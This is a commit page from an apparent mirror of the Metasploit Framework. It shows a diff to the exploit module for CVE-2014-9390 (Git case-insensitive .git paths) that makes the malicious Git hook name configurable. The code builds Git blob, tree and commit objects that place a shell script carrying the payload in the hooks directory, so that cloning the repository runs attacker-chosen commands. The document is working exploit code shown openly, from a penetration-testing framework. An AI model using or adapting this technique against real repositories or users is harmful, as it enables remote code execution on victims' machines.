infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Make malicious hook file name be customizable

bug/bundler_fix
Jon Hart 2014-12-22 08:28:55 -08:00
parent 7f3cfd2207
commit 308eea0c2c
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 12 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/multi/http/git_cve_2014_9390.rb
View File

@ -62,7 +62,14 @@ class Metasploit4 < Msf::Exploit::Remote
register_options(
[
OptString.new('URIPATH', [true, 'The URI to use as the malicious Git instance', '/got.git'])
])
]
)
register_advanced_options(
[
OptString.new('GIT_HOOK', [true, 'The Git hook to use for exploitation', 'post-checkout'])
]
)
end
def setup
@ -76,14 +83,14 @@ class Metasploit4 < Msf::Exploit::Remote
# .git/hooks/post-checkout and will subsequently execute commands of our
# choosing upon cloning
@file_paths = {}
# build the post-update file blob
# build the hook file blob
full_cmd = "#!/bin/sh\n#{payload.encoded}"
sha1, content = build_object('blob', full_cmd)
@file_paths["/objects/#{get_path(sha1)}"] = content
# build tree that points to the blob
sha1, content = build_object('tree', "100755 post-checkout\0#{[sha1].pack('H*')}")
sha1, content = build_object('tree', "100755 #{datastore['GIT_HOOK']}\0#{[sha1].pack('H*')}")
@file_paths["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the hooks directory in which post-update lives
# build a tree that points to the hooks directory in which the hook lives, called hooks
sha1, content = build_object('tree', "40000 hooks\0#{[sha1].pack('H*')}")
@file_paths["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the partially uppercased .git directory in
@ -120,8 +127,7 @@ class Metasploit4 < Msf::Exploit::Remote
vprint_status("Malicious commit is:")
commit.each_line { |l| vprint_status(l.strip) }
end
commit_content = "tree #{sha1}\n#{commit}"
sha1, content = build_object('commit', commit_content)
sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
@file_paths["/objects/#{get_path(sha1)}"] = content
# build HEAD
@file_paths['/HEAD'] = "ref: refs/heads/master\n"